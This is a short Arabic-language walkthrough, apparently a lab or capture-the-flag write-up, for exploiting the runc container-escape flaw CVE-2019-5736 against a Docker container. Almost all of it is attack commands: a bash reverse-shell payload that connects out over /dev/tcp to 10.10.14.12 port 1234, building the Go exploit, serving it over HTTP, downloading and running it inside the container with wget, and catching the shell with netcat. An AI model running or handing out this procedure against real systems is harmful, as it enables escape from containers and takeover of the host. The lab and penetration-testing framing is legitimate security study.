
أداة استغلال مبنية على لغة Go لثغرة CVE-2019-5736 (الهروب من حاوية Runc) مع حمولة قشرة عكسية قابلة للتخصيص، مصممة لاختبار الاختراق وعمليات الفريق الأحمر ضد حاويات Docker الضعيفة.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
الجهاز ضعيف تجاه CVE-2019-5736، اتبع الخطوات في استغلال Runc (CVE-2019-5736). قم بتنزيل الملف main.go، وغيّر الحمولة (payload) في الملف إلى:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
بعد ذلك، قم بتشغيل:
go build main.go
استضف خادم http :
python3 -m http.server

ثم افتح 3 أجهزة طرفية كما يلي :

الطرفية 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
الطرفية 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
الطرفية 3
nc -nlvp 1234
بمجرد تشغيل ./main في أول طرفية ssh، قم فورًا بتشغيل الأمر الثاني في طرفية ssh الثانية، وستحصل على صدفة عكسية (reverse shell) عبر netcat في الطرفية الثالثة.

